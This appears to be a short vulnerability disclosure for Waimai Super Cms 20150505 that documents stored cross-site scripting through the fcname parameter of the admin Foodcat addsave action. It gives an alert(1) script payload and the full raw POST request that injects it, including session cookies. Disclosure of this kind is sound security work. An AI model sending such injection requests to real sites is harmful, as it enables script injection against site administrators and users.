xss Vulnerability in Waimai Super Cms 20150505 via fcname parameter #7
Description
In waimai Super Cms 20150505,there is an XSS vulnerability via the /admin.php/Foodcat/addsave fcname parameter.
Payload:<script>alert(1);</script>
POST /sug/waimaicmsn/waimai-master/admin.php?m=Foodcat&a=addsave HTTP/1.1
Host: xx.x.x.x:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Foodcat&a=add
Cookie: wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; page_iframe_url=http://xx.x.x.x:xxxx/x/metinfo6.1.0/feedback/index.php?lang=cn&pageset=1; PHPSESSID=h7ifph1mdupppqcop7hhhd6581; INTELLI_569865769d=5de28b7671feba6befb9abfbac2bf155
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
fcname=form<script>alert(1);</script>&fcsort=0